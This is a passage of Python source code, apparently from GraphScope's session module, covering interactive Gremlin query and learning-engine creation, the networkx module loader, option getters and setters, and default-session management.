>>> interactive_query.close()
>>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
Args:
graph (:class:`graphscope.framework.graph.GraphDAGNode`):
The graph to create interactive instance.
engine_params (dict, optional): Configure startup parameters of interactive engine.
You can also configure this param by `graphscope.set_option(engine_params={})`.
See a list of configurable keys in
`interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
Raises:
InvalidArgumentError:
- :code:`graph` is not a property graph.
- :code:`graph` is unloaded in eager mode.
Returns:
:class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
InteractiveQuery to execute gremlin queries, evaluated in eager mode.
"""
# Interactive query instance won't add to self._interactive_instance_dict in lazy mode.
# self._interactive_instance_dict[graph.vineyard_id] will be None if InteractiveQuery closed
if (
self.eager()
and graph.vineyard_id in self._interactive_instance_dict
and self._interactive_instance_dict[graph.vineyard_id] is not None
):
interactive_query = self._interactive_instance_dict[graph.vineyard_id]
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(interactive_query.error_msg)
else:
# Initializing.
# while True is ok, as the status is either running or failed eventually after timeout.
while True:
time.sleep(1)
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(
interactive_query.error_msg
)
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
# cache the instance of interactive query in eager mode
interactive_query = InteractiveQuery()
self._interactive_instance_dict[graph.vineyard_id] = interactive_query
try:
enable_gaia = self._config_params["enable_gaia"]
_wrapper = self._wrapper(
InteractiveQueryDAGNode(self, graph, engine_params, enable_gaia)
)
except Exception as e:
if self.eager():
interactive_query.status = InteractiveQueryStatus.Failed
interactive_query.error_msg = str(e)
raise InteractiveEngineInternalError(str(e)) from e
else:
if self.eager():
interactive_query = _wrapper
graph._attach_interactive_instance(interactive_query)
return _wrapper
def learning(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Args:
nodes (list): The node types that will be used for gnn training.
edges (list): The edge types that will be used for gnn training.
gen_labels (list): Extra node and edge labels on original graph for gnn training.
Returns:
:class:`graphscope.learning.GraphDAGNode`:
An instance of learning graph that could be feed to the learning engine, evaluated in eager node.
"""
if (
self.eager()
and graph.vineyard_id in self._learning_instance_dict
and self._learning_instance_dict[graph.vineyard_id] is not None
):
return self._learning_instance_dict[graph.vineyard_id]
if sys.platform != "linux" and sys.platform != "linux2":
raise RuntimeError(
"The learning engine currently supports Linux only, doesn't support %s"
% sys.platform
)
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
from graphscope.learning.graph import GraphDAGNode as LearningGraphDAGNode
_wrapper = self._wrapper(
LearningGraphDAGNode(self, graph, nodes, edges, gen_labels)
)
if self.eager():
self._learning_instance_dict[graph.vineyard_id] = _wrapper
graph._attach_learning_instance(_wrapper)
return _wrapper
def nx(self):
if not self.eager():
raise RuntimeError(
"Networkx module need session to be eager mode. "
"The session is lazy mode."
)
if self._nx:
return self._nx
import importlib.util
spec = importlib.util.find_spec("graphscope.nx")
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
graph = type("Graph", (mod.Graph.__base__,), dict(mod.Graph.__dict__))
digraph = type("DiGraph", (mod.DiGraph.__base__,), dict(mod.DiGraph.__dict__))
setattr(graph, "_session", self)
setattr(digraph, "_session", self)
setattr(mod, "Graph", graph)
setattr(mod, "DiGraph", digraph)
self._nx = mod
return self._nx
session = Session
def set_option(**kwargs):
"""Set the value of specified options.
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_gie_graph_manager_image
- k8s_zookeeper_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- enable_gaia
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
kwargs: dict
kv pair of GraphScope config you want to set.
Raises:
ValueError: If no such option exists.
Returns: None
"""
# check exists
for k, v in kwargs.items():
if not hasattr(gs_config, k):
raise ValueError("No such option {} exists.".format(k))
for k, v in kwargs.items():
setattr(gs_config, k, v)
GSLogger.update()
def get_option(key):
"""Get the value of specified option.
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_gie_graph_manager_image
- k8s_zookeeper_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- enable_gaia
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
key: str
Key of GraphScope config you want to get.
Raises:
ValueError: If no such option exists.
Returns: result: the value of the option
"""
if hasattr(gs_config, key):
return getattr(gs_config, key)
else:
raise ValueError("No such option {} exists.".format(key))
def default_session(session):
"""Python's :code:`with` handler for defining a default session.
This function provides a means of registering a session for handling
and code that need a default session calls.
The :code:`with` keyword to specify that code invocations within
the scope of a block should be executed by a particular session.
Args:
session: :class:`Session`
The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
def get_default_session():
"""Returns the default session for the current context.
Raises:
RuntimeError: Default session is not exist.
Returns:
The default :class:`Session`.
"""
return _default_session_stack.get_default()
def get_session_by_id(handle):
"""Return the session by handle."""
if handle not in _session_dict:
raise ValueError("Session {} not exists.".format(handle))
return _session_dict.get(handle)
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
raise RuntimeError("No default session found.")
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
_default_session_stack = _DefaultSessionStack() # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return get_default_session().g(incoming_data, oid_type, directed, generate_eid)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.